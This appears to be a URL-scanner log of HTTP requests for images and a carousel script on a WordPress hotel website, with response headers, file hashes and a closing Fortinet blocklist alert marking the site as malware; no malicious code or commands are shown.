Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   4292
Md5:    a11a4b7762ed3a1a10ad518b5b51155d
Sha1:   2d40b94fdc840fc0d20d188166794a7b8a815f5a
Sha256: 32beaeb98ff806564caae3063caa4c91500480f2680293cbfcb083f5d6c2f35b
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img8.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 68208
Keep-Alive: timeout=3, max=90
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 630x630, components 3\012- data
Size:   68208
Md5:    3d3050cf3739b4a39dd2f6d3b3f9d65b
Sha1:   e498b6319be235218f4f85f39f876f3fad8a4069
Sha256: e19121217e2f4d8b9547242e3fb79a5fc6ca1f9a37b81b4a0aee2146a8b66dd2
                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img20.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 100123
Keep-Alive: timeout=3, max=88
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x650, components 3\012- data
Size:   100123
Md5:    92b778b8beadda595381ece697b17d45
Sha1:   8cc1c42929d7f35b907a447c4a4e09866718929c
Sha256: 60444d1d58bdfa94b3fee4da8fba717c2fc8ed62db854168c3656e591d25c050
                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img25.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 228793
Keep-Alive: timeout=3, max=90
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x513, components 3\012- data
Size:   228793
Md5:    484e6a4d6d66220fae3936642594b306
Sha1:   c72a2ea6ffaeefdf3a96fd244f357c4cb1660915
Sha256: 560b801509089f04fbb051619718e2eb5556921be3b83dd2cb2d5e28b936c3f6
                                        
                                            GET /wp-content/uploads/2018/08/icon.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 03:00:27 GMT
Accept-Ranges: bytes
Content-Length: 1948
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 55x38, components 3\012- data
Size:   1948
Md5:    ac8d2c08b7dfd8a48726875cf8ae2e41
Sha1:   784156736088003b49e117c7b87c27e98eee199e
Sha256: ab454661c039982ec304a469d5edc41a821cf54aabfe3c714a0403b839c6a324
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/js/owl.carousel.js?ver=2.2.1 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 88643
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Malware